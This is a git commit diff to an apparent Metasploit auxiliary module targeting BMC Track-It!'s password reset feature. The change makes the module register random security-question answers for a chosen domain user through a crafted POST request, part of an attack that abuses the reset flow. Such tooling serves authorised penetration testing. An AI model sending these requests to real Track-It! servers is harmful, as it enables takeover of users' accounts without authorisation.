Use random security Q/A

jhart-r7 · jhart-r7 · commit 48dcfd980922 · 2014-12-11T17:10:33.000-08:00
diff --git a/modules/auxiliary/gather/bmc_trackit_passwd_reset.rb b/modules/auxiliary/gather/bmc_trackit_passwd_reset.rb
@@ -116,6 +116,7 @@ def run_host(ip)
 
     full_user = "#{domain}\\#{localuser}"
     vprint_status("#{peer}: sending password reset request for #{full_user}")
+    answers = [ Rex::Text.rand_text_alpha(8), Rex::Text.rand_text_alpha(8) ]
     res = send_request_cgi(
       'uri' => normalize_uri(target_uri.path, 'PasswordReset', 'Application', 'Register'),
       'method' => 'POST',
@@ -124,14 +125,14 @@ def run_host(ip)
         'domainname' => domain,
         'userName' => localuser,
         'emailaddress' => Rex::Text.rand_text_alpha(8) + '@' + Rex::Text.rand_text_alpha(8) + '.com',
-        'userQuestions' => '[{"Id":1,"Answer":"not"},{"Id":2,"Answer":"not"}]',
+        'userQuestions' => %Q([{"Id":1,"Answer":"#{answers.first}"},{"Id":2,"Answer":"#{answers.last}"}]),
         'updatequesChk' => 'false',
         'SelectedQuestion' => 1,
         'SelectedQuestion' => 2,
-        'answer' => 'not',
-        'answer' => 'not',
-        'confirmanswer' => 'not',
-        'confirmanswer' => 'not'
+        'answer' => answers.first,
+        'answer' => answers.last,
+        'confirmanswer' => answers.first,
+        'confirmanswer' => answers.last
       }
     )
 
